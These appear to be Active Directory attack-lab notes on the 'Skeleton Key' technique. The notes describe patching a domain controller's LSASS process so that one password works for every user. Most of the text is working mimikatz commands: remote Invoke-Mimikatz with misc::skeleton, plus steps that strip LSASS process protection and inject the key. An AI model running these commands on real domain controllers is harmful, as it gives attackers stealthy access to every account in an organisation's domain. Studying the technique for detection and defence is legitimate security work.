Skeleton key is a persistence technique where it is possible to patch a Domain Controller (lsass process) so that it allows access as any user with a single password.
The attack was discovered by Dell Secureworks used in a malware named the Skeleton Key malware.
All the publicly known methods are NOT persistent across reboots.
Yet again, mimikatz to the rescue.
Use the below command to inject a skeleton key (password would be mimikatz) on a Domain Controller of choice. DA privileges required
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorpdc.dollarcorp.moneycorp.local
Enter-PSSession –Computername dcorp-dc –credential dcorp\Administrator
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-